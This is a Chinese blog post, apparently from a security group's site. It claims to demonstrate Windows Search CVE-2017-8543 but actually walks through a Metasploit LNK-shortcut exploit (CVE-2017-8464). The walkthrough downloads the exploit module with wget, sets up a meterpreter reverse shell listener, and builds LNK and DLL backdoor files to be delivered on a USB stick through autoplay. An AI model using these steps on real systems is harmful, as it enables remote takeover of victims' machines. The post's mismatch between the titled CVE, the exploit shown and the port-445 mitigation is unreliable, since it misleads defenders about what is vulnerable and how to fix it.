FavoriteLoading
0

Windows Search(CVE-2017-8543)远程代码执行漏洞演示

0x01概述

  我大概说一下,Windows Search是一个什么鬼东西,Windows Search是Windows搜索服务(WSS)即windows的一项默认启用的基本服务,允许用户在多个Windows服务和客户端之间进行搜索。当Windows搜索处理内存中的对象时,存在远程执行代码漏洞。成功利用此漏洞的攻击者可以控制受影响的系统。受影响的windows系统,我一会补充在下面。

0x02漏洞级别

        漏洞级别:严重

(说明:漏洞级别共四级:一般、重要、严重、紧急)

0x03影响范围

          桌面系统:Windows XP, Vista, 7, 8, 8.1, RT 8.1, 10(次不刺激?)

        服务器系统:Windows Server 2003,2008,2012,2016

        微软给出的参考说明:

        https://portal.msrc.microsoft.com/zh-cn/security-guidance/advisory/CVE-2017-8543

0x04进入演示攻击

        那么网上给出的报告仅仅只是报告,我今天就来带大家演示一遍攻击过程。首先我要模拟攻击者和靶机。

        kalix86   192.168.1.109  攻击机

        windows7x64  192.168.1.101  目标靶机


 1.kali主机下载cve_2017_8464_lnk_rce.rb:

cd  /opt
wget  http://www.8090-sec.com/file/cve_2017_8464_lnk_rce.rb

将cve_2017_8464_lnk_rce.rb拷贝到
/usr/share/metasploit-framework/modules/exploit/windows/smb/目录下:

cp  cve_2017_8464_lnk_rce.rb  /usr/share/metasploit-framework/modules/exploits/windows/smb/

生成监听shell:

msf > use exploit/multi/handler
msf  exploit(handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.109
msf exploit(handler) > exploit -j

生成大量的.LNK文件(对应盘符从D盘到Z盘)和要加载的.dll文件(后门文件, copy了一个lnk文件(根据插入靶机U盘后识别的盘符,例如我插入U盘后显示的E盘,所以就选择了E结尾的lnk文件)和dll文件到U盘)

msf exploit(handler) > back
msf > use exploit/windows/smb/cve_2017_8464_lnk_rce
msf exploit(cve_2017_8464_lnk_rce) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf exploit(cve_2017_8464_lnk_rce) > set LHOST 192.168.1.109
msf exploit(cve_2017_8464_lnk_rce) > exploit

将/root/.msf4/local/*所有文件拷贝到/opt目录下的test文件夹中,然后拷贝到目标靶机windows7X64上

root@backlion:~# cd /opt
root@backlion:/opt# mkdir test
root@backlion:/opt# cp  /root/.msf4/local/*   test/
root@backlion:/opt# cd  test/
root@backlion:/opt/test# ls

拷贝的本机win7x64上:

然后点击快捷键,就会触发注册dll文件,如果不行直接注册dll文件(一般是将这项快捷键和DLL文件拷贝到一个文件夹里面然后拷贝到U盘,只要对方开了U盘自动启动播放功能,就会自动触发注册dll文件)

在kali下可以看到成功获得sesions会话为1

sessions  -i 1

然后进入到会话,就会成功进入到metermter的shell界面:

到这里就演示结束了..

0x05排查方案

        检查windows系统版本,如果版本在受影响的产品清单中,则受该漏洞影响。

0x06安全建议

        1.在系统防火墙或者安全组对445端口进行限制;
        2.升级建议:可通过Windows Update自动更新微软补丁修复漏洞,也可以手动下载补丁,补丁下载地址:
        https://portal.msrc.microsoft.com/zh-cn/security-guidance/advisory/CVE-2017-8543
        注意:修复漏洞前请将资料备份,并进行充分测试。

【声明】:8090安全小组门户(http://www.8090-sec.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱hack@ddos.kim,我们会在最短的时间内进行处理。